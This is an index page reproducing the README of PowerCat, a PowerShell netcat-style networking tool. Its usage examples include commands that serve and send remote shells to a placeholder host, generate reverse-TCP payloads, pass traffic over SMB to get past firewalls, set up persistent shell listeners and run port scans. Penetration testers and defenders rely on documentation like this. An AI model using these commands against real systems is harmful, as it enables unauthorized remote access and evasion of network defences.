Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/secabstraction/powercat
A PowerShell TCP/IP swiss army knife.
https://github.com/secabstraction/powercat
Last synced: 26 days ago
JSON representation
A PowerShell TCP/IP swiss army knife.
- Host: GitHub
- URL: https://github.com/secabstraction/powercat
- Owner: secabstraction
- License: bsd-3-clause
- Created: 2015-09-21T12:27:44.000Z (about 9 years ago)
- Default Branch: master
- Last Pushed: 2017-05-01T23:25:45.000Z (over 7 years ago)
- Last Synced: 2024-08-08T21:19:20.606Z (4 months ago)
- Language: PowerShell
- Homepage:
- Size: 149 KB
- Stars: 556
- Watchers: 38
- Forks: 96
- Open Issues: 0
-
Metadata Files:
- Readme: ReadMe.md
- License: LICENSE
Awesome Lists containing this project
- awesome-network-stuff - **490**星
README
PowerCat
====
A PowerShell TCP/IP swiss army knife that works with Netcat & Ncat
Inspired by: https://github.com/besimorhino/powercatInstallation
------------
PowerCat is packaged as a PowerShell module. You must import the module to use its functions.
```powershell
# Import the functions via the psd1 file:
Import-Module PowerCat.psd1
```
#### Functions & Parameters:
```powershell
Start-PowerCat # Starts a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: ":"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds
Connect-PowerCat # Connects a client to a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: "::"
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds
```
Basic Connections
-----------------------------------
By default, PowerCat uses TCP and reads from / writes to the console.
```powershell
# Basic Listener:
Start-PowerCat -Port 443
# Basic Client:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443
```
File Transfer
-------------
PowerCat can be used to transfer files using the -SendFile and -ReceiveFile parameters.
```powershell
# Send File:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile
# Receive File:
Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile
```
Shells
------
PowerCat can be used to send and serve (Power)Shells using the -Execute parameter.
```powershell
# Serve a shell:
Start-PowerCat -Port 443 -Execute
# Send a Shell:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute
```
UDP and SMB
-----------
PowerCat supports more than sending data over TCP.
```powershell
# Send Data Over UDP:
Start-PowerCat -Mode Udp -Port 8000
# Send Data Over SMB (easily sneak past firewalls):
Start-PowerCat -Mode Smb -PipeName PowerCat
```
SSL
-----------
PowerCat generates X509 certificates on-the-fly to provide SSL encryption of TCP connections.
```powershell
# Admin privileges are required to generate the self-signed certificate.
# Serve an SSL-Encrypted (Power)Shell:
Start-PowerCat -Mode Tcp -Port 80 -SslCn -Execute
# Connect to an SSL encrypted Ncat listener:
# Setup *nix with openssl & Ncat:
# openssl req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem
# ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem
Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat
```
Relays
------
Relays in PowerCat are similar to netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
```powershell
# UDP Listener to TCP Client Relay:
Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443
# TCP Listener to UDP Client Relay:
Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53
# TCP Client to Client Relay
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443
# TCP Listener to SMB Listener Relay
New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat
```
Generate Payloads
-----------------
Payloads can be generated using the New-PowerCatPayload function.
```powershell
# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute
# Generate a tcp payload that listens on port 8000:
New-PowerCatPayload -Listener -Port 8000 -Execute
```
Misc Usage
----------
PowerCat can also perform port-scans, start persistent listeners, or act as a simple web server.
```powershell
# Basic TCP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }
# Basic UDP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }
# Persistent listener:
Start-PowerCat -Port 443 -Execute -KeepAlive
# Simple Web Server:
Start-PowerCat -Port 80 -SendFile index.html
```
Exiting
----------
In most cases, the ESC key can be used to gracefully exit PowerCat.